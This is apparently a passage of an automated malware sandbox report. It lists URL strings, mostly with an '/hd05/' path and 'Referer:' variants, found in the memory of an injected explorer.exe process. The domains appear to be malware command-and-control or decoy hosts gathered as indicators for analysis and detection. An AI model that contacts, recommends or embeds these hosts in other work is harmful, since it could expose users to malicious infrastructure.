Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net/hd05/C
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net/hd05/www.furanoikedanouen.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.netReferer:
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.evans-gdaddy-test-domain.online
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.evans-gdaddy-test-domain.online/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.evans-gdaddy-test-domain.online/hd05/www.7727.info
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.evans-gdaddy-test-domain.onlineReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furanoikedanouen.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furanoikedanouen.com/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furanoikedanouen.com/hd05/www.gaiacoreresearch.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furanoikedanouen.comReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fursace.club
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fursace.club/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fursace.club/hd05/www.aquariusbusiness.info
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fursace.clubReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaiacoreresearch.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaiacoreresearch.com/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaiacoreresearch.com/hd05/www.fursace.club
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaiacoreresearch.comReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz/hd05/www.codyscalls.com
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz/hd05/www.sparkfirestarter.net
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyzReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lorenzodavissr.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lorenzodavissr.com/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lorenzodavissr.com/hd05/www.q3hjns.shop
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lorenzodavissr.comReferer:
Source: explorer.exe, 0000000A.00000002.2426276889.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.musiletras.co
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.musiletras.co/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.musiletras.co/hd05/www.connect-talent.com
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.musiletras.coReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.q3hjns.shop
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.q3hjns.shop/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.q3hjns.shop/hd05/www.blogonrunning.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.q3hjns.shopReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.satwaspin.net
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.satwaspin.net/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.satwaspin.net/hd05/www.taxilasamericas.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.satwaspin.netReferer:
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net/hd05/www.evans-gdaddy-test-domain.online
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.netReferer:
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.system.ngo
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.system.ngo/hd05/
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.system.ngo/hd05/www.vagabondtracks.com
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.system.ngoReferer:
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxilasamericas.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxilasamericas.com/hd05/
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxilasamericas.com/hd05/www.vagabondtracks.com
Source: explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxilasamericas.comReferer:
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thierrydoublein.com
Source: explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.thierrydoublein.com/hd05/
